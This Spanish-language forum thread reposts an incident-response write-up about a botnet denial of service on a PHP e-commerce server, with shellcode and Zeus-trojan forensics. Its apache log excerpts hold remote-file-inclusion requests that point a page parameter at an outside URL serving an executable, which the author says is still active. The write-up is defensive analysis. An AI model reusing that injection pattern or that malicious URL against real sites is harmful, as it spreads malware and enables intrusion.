Resultados 1 al 4 de 4

Tema: Que vienen los Zombis !! (Historia de una denegacin de servicio)

  1. #1 Que vienen los Zombis !! (Historia de una denegacin de servicio) 
    HH Administrator Avatar de LUK
    Fecha de ingreso
    Oct 2001
    Ubicacin
    Spaa
    Mensajes
    5.010
    Descargas
    179
    Uploads
    246
    Voy a comentar algo que nos puede suceder a todos, una denegacin de servicio.

    El caso es el siguiente, empresa suministradora de productos de recambios de automvil, tiene un servicio web (en PHP) de seguimiento de pedidos y comercio electrnico. Desde hace un tiempo parece que el servicio que prestan se degrada, haciendo imposible el acceso a la web.

    Viernes 4 de Junio (15:30h)

    El servidor web empieza a ir excesivamente lento, parece que va mal la aplicacin web. Los informticos restablecen el servicio.

    Lunes 7 de Junio

    Parece que el servidor no muestra el contenido de su web o parece que tarda en exceso en servir las pginas, parece que est caido. Tras comprobar que la mquina est bien, se ve que contiene multiples instancias del servidor web apache. Tras reiniciarlo al momento vuelve a tener problemas de carga. Esto se mantiene prcticamente durante todo el da.

    Martes 8 de Junio

    8:30h .- El servidor sigue sin seales de vida, se precisa con urgencia que el servidor este activo, dado que la mayoria de los pedidos se realiza por comercio electrnico. Gran tensin en el departamento comercial y de compras. Se llega a la conclusin que desconectando el cable de red (el de internet) la aplicacin funciona correctamente en localhost

    9:30h.- Analizamos lo sucedido:

    Aplicacin a medida de comercio electrnico en PHP con LAMP, todo monitorizado con Nagios y Awstats.

    Empezamos con lo que me dan, analizando las estadisiticas. Podemos ver que efectivamente hay un considerable aumento



    Mas cuando nos indican que el pico ms alto de visitas es de unos 300 diarios, en el peor de los casos.

    Si vemos la memoria de la mquina comprobamos que esta algo saturada



    Y si vemos el trfico de red, ni que decir tiene



    Es decir, parece que adems del nmero excesivo de conexiones, hay algo desbocado.

    10:00h.- Conseguimos hacer un netstat a la mquina y esta devuelve la sorprendente lista de ms de 75.000 conexiones al servidor web, tras direccionarlo a fichero (mas comodo para trabajar) vemos que la mayoria de direcciones viene del rango 222.73.68.X y que la ip 222.73.68.23 es la que ms conexiones activas tiene. Tiene pinta de una botnet




    Si lo intentamos Geolocalizar vemos que casi todas y especialmente estas son de China



    Vamos a grabar el trfico de red, utilizando TCPDUMP, para posteriormente anlizar el mismo.

    10:10h.- Vemos el log de apache, esto es importante, despues de un buen rato me choca las lneas que se repiten, especialmente esta:

    222.73.68.23/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
    222.73.68.24/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
    222.73.68.99/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php

    Abro mi mquina virtual y desde el navegador introduzco la URL que me redirecciona al dominio 'asf.wdn.com', que ha su vez me regala un caramelito que ms tarde ser objeto de estudio





    NOTA: Cuidadin que est todavia activa y te descarga algo

    10:11h.- Cerramos en el cortafuegos todo el rango posible de la red 222. El servidor empieza a tener mejorias y el servicio se restablece.

    10:20h.- Se decide por parte de los responsables cerrar el mayor rango posible de IP's de Asia.

    11:00h.- Se cierra el caso y el servidor funciona perfectamente.

    12:00h.- Me he llevado el EXE de la pgina web maliciosa y el trfico en formato PCAP

    13:20h.- Vamos a revisar el fichero del TCPDUMP con Whireshark. Tras un rato veo lo siguiente. Rh/cath/bin..Rhsswdh//pah/etc, todo apunta que adems de las conexiones estn mandando algo al servidor web





    Tiene pinta de lo que es, un Shellcode, vamos a intentar guardar esa porcin de cdigo y proceder a su desemsablado


    Y ahora que ya lo tenemos vamos a compilarlo y lanzarlo en un entorno controlado.


    Bueno, pues todo apunta a un exploit remoto que en aparencia devuelve el contenido del fichero passwd.

    AHORA A POR EL EJECUTABLE

    Vamos a lanzar en una mquina virtual (sin actualizaciones) windows xp con IE 6.0 y corriendo Process Monitor de Sysinternals y una utilidad que me ha venido muy bien en alguna ocasin que se llama SpyMonitor y que sirve para monitorizar los cambios y ver a posteriori las diferencias.

    Estos son los resultados:

    Con privilegio de administrador se han creado los siguientes ficheros
    %systemroot%\system32\sdra64.exe
    %systemroot%\system32\lowsec
    %systemroot%\system32\lowsec\user.ds
    %systemroot%\system32\lowsec\user.ds.lll
    %systemroot%\system32\lowsec\local.ds
    Sin ser administradores:
    %appdata%\sdra64.exe
    %appdata%\lowsec
    %appdata%\lowsec\user.ds
    %appdata%\lowsec\user.ds.lll
    %appdata%\lowsec\local.ds
    Cambios que se han realizado en el registro:
    HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    En la clave 'userinit'
    "Userinit" = "C:\WINDOWS\system32\userinit.exe
    Por esta nueva:
    "Userinit" = "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\syste m32\sdra64.exe"
    Sin ser administradores
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    En la clave 'userinit'
    "Userinit" = "C:\Documents and Settings\%;user%;\Application Data\sdra64.exe"

    Googleando y por lo que dicen en los foros, todo apunta a una variante del ya famoso troyano ZEUS y para poner la puntilla he bscado la IP atacante en Zeus Tracker. Zeus Tracker proporciona la posibilidad para realizar un seguimiento de ZeuS (servidores, paneles de control) y los host maliciosos que albergan los archivos de Zeus.

    Y aqu tenemos nuestra IP Zombi




    Muy, muy curioso...Seguiremos investigando

    Quiero agradecer la ayuda a Eduardo Abril, que me ha ayudado en el desemsablado del shellcode

    Fuente: http://conexioninversa.blogspot.com/2010/06/que-vienen-los-zombis-historia-de-una.html
    [][][] LUK [][][]
    hackhispano.com
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Apr 2010
    Mensajes
    1.052
    Descargas
    7
    Uploads
    0
    Jaja interesante... Sta curiosilla la historia eh? Aunque la mayora de servidores denegan ya un cierto numero de peticiones de la misma ip y por eso es tan dificil hacer DoS..xD
    • Taller de programacin HackHispano: http://tallerdeprogramacion.es
    • Wargame HackHispano: [PRXIMAMENTE]
    • Normas del foro: http://foro.hackhispano.com/announcement.php?f=2
    Citar  
     

  3. #3  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicacin
    HackHispano/SM
    Mensajes
    7.709
    Descargas
    30
    Uploads
    8
    Cita Iniciado por hckr Ver mensaje
    Jaja interesante... Sta curiosilla la historia eh? Aunque la mayora de servidores denegan ya un cierto numero de peticiones de la misma ip y por eso es tan dificil hacer DoS..xD
    Por eso es porque se usan los Dos distribuidos,para evitar filtros de firewalls y routers...
    Citar  
     

  4. #4  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicacin
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    Muy interesante anlisis forence.
    Sobre todo el desamblado del binario.. mis conocimientos no hubieran llegado hasta ah, y fue de lo ms interesante.

    buen articulo,

    Saludos,
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

Temas similares

  1. Denegacin de servicio en Cisco IOS XR
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    ltimo mensaje: 02-09-2010, 11:00
  2. Denegacin de servicio en RealPlayer
    Por clarinetista en el foro NOTICIAS
    Respuestas: 0
    ltimo mensaje: 21-01-2007, 14:08
  3. Denegacin de servicio en Apache 2
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    ltimo mensaje: 23-03-2004, 22:14
  4. Denegacin de servicio en mIRC
    Por Sn@ke en el foro NOTICIAS
    Respuestas: 1
    ltimo mensaje: 14-10-2003, 11:40
  5. Denegacin de servicio en Eudora
    Por calymax en el foro NOTICIAS
    Respuestas: 0
    ltimo mensaje: 28-05-2003, 08:00

Marcadores

Marcadores

Permisos de publicacin

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •